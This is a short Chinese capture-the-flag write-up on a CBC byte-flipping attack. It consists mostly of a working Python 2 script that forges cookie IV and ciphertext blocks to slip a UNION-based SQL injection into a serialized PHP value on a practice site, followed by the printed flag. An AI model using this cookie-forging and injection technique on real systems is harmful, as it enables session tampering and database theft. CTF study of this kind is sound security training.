此题考点:cbc字节反转攻击。
解题脚本如下:
#coding:utf-8
#python2
#cbc字节反转攻击
import requests,base64,urllib,math
def work():
url = 'http://ctf5.shiyanbar.com/web/jiandan/index.php'
payload = '0 union select 1,value,3 from you_want limit 1#'
#payload = 'x'*20
plaintext = 'a:1:{s:2:"id";s:%d:"%s";}'%(len(payload),payload)
badText = 'x'*16
if len(plaintext)%16:
if len(plaintext)%16>3:
badText = 'x'*(len(plaintext)%16-3)+'";}'
elif len(plaintext)%16 == 3:
badText = '";}'
elif len(plaintext)%16 == 1:
badText = '}'
else:
badText = ';}'
r = requests.post(url,data={'id':'x'*len(payload)})
sc = r.headers['Set-Cookie'].split(',')
iv = 'a'*16
cipher = sc[1][sc[1].find('=')+1:]
blockNum = len(cipher)/16
cipher = base64.b64decode(urllib.unquote(cipher))
blockNum = len(cipher)/16
cipherBlock = [iv]
cipherBlock += [cipher[16*i:16*(i+1)] for i in xrange(blockNum)]
plainBlock = [plaintext[16*i:16*(i+1)] for i in xrange(blockNum)]
for i in xrange(blockNum-1,-1,-1):
s1 = plainBlock[i]
s2 = cipherBlock[i]
tmp = ''
for j in xrange(len(s1)):
tmp += chr(ord(s1[j])^ord(badText[j])^ord(s2[j]))
cipherBlock[i]=tmp+s2[len(tmp):]
if i == 0:
iv = cipherBlock[0]
iv_new = urllib.quote(base64.b64encode(iv))
cipher_new = urllib.quote(base64.b64encode(''.join(cipherBlock[1:])))
headers={'Cookie':'iv={};cipher={}'.format(iv_new,cipher_new)}
r = requests.get(url,headers=headers)
if i != 0:
tmp = r.text[r.text.find('decode')+8:r.text.rfind("')")]
badText = base64.b64decode(tmp)[16*(i-1):16*i]
else:
print r.text.encode('gb18030')
work()
root@vm-kali:~/Documents# /usr/bin/python /root/Documents/cbc.py
�0�7�0�3�0�7<h1><center>Hello!flag{c42b2b758a5a36228156d9d671c37f19}</center></h1>
参考:https://blog.csdn.net/kostart123/article/details/81222989
网友评论